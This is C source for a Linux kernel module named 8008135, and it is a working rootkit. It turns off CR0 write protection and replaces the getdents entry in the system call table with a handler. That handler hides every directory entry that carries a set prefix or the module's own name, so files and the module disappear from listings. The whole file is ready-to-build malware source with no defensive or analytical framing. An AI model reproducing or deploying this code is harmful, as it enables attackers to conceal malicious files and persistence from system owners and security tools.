/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**** includes *****************************************************************
*******************************************************************************/
#include "8008135.h"
/**** var ********************************************************************
*******************************************************************************/
sys_getdents_t sys_getdents_orig = NULL;
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count) {
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
// if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
#if defined DEBUG
printk("\n hide prefix or mod name contained!\n");
printk("\n ret %ld\n ", ret);
printk("\n dbuf %d\n" , dbuf);
printk("\n");
printk(ent->d_name);
#endif
// remove this entry by copying everything after it forward
// and adjust the length reported
#if defined DEBUG
printk("\n reclen %u \n", ent->d_reclen);
#endif
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
#if defined DEBUG
printk("\n ret after change %ld\n ", ret);
#endif
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_init
* DESCRIPTION: initializing Kernel Module
* PARAMETERS: -
* RETURNS: int
*******************************************************************************/
static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "New syscall in place\n");
return 0;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_exit
* DESCRIPTION: unloading Kernel Module
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
static void __exit exit_8008135(void) {
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "Old syscall back\n");
}
// Setting pointers to init-/exit-functions
module_init(init_8008135);
module_exit(exit_8008135);